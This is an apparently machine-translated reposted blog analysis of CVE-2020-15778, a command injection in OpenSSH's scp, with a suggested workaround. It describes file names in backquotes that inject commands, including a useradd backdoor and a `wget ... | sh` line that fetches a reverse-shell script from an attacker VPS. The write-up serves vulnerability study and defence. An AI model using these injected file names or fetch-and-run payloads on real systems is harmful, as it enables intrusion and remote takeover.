current position:Home>Cve-2020-15778 SSH vulnerability recurrence analysis

Cve-2020-15778 SSH vulnerability recurrence analysis

2022-05-15 07:51:53Irteam - Industrial Safety

In many industrial routers and some controllers , Adopted OpenSSH To do external connection and management .2020 year 7 month 9 By foreign security researchers ChinmayPandya Find out OpenSSH 8.3 p1 And before SCP There is a command injection vulnerability in the command .

For the above https://github.com/openssh/openssh-portable/blob/master/scp.c Code for ,989 Line is where the vulnerability is triggered . When copying files to a remote server , The file path is attached locally scp At the end of the order . for example , If you execute the following command :

scp [email protected]:directory/TargetFile

It will execute a local command :

scp-t directory/TargetFile

When creating a local scp On command , It doesn't clean up file names . An attacker can use backquotes (`) File is injected as a command . and linux The system can accept backquotes (`) Name the file . If you try to payload Put it in back quotation marks as the file name , When calling scp Command will trigger the execution of this instruction .

Exploit scenarios :

Attackers can use U The disk is disguised as device firmware or some kind of tool , stay U Create a deep subdirectory , A file in a directory can be named `payload`, such as `reboot`. When the victim copies U Disk directories and files are used scp -r \ Folder RemoteIP:\ Folder When you give this order , Will trigger the victim's machine to restart , Similarly, if you use backquotes +useradd Such a filename , You can open the back door directly on the victim's machine . Of course, the sick red team uses , Is in the VPS Upper assumption FTP Put rebound shell Script , Then use backquotes (`) combination wget http:// vps:port/xxx.sh | sh ./xxx.sh As the file name , Trigger the victim to rebound shell To VPS On .

For the execution of remote commands , Still need bypass authorized_keys, So the remote is less likely to be used . The following section PoC video , Just to show you , It is possible to execute commands remotely , But the premise is bypass authorized_keys otherwise , You still need to know

password Of .

Video demo :http://mpvideo.qpic.cn/0bf2pyaggaaabeahhgjgcrpva7wdmn7aayya.f10002.mp4?

Protection solutions

Up to now openssh Of github Didn't fix this loophole , Ban scp -r Overall directory copy method , use tar After compressing the directory into a single file ,scp After uploading to the remote machine , Again ssh Extract the directory from the remote machine .

Reference resources :https://github.com/cpandya2909/CVE-2020-15778

copyright notice
author[Irteam - Industrial Safety],Please bring the original link to reprint, thank you.
https://en.chowdera.com/2022/131/202205102047500324.html

Random recommended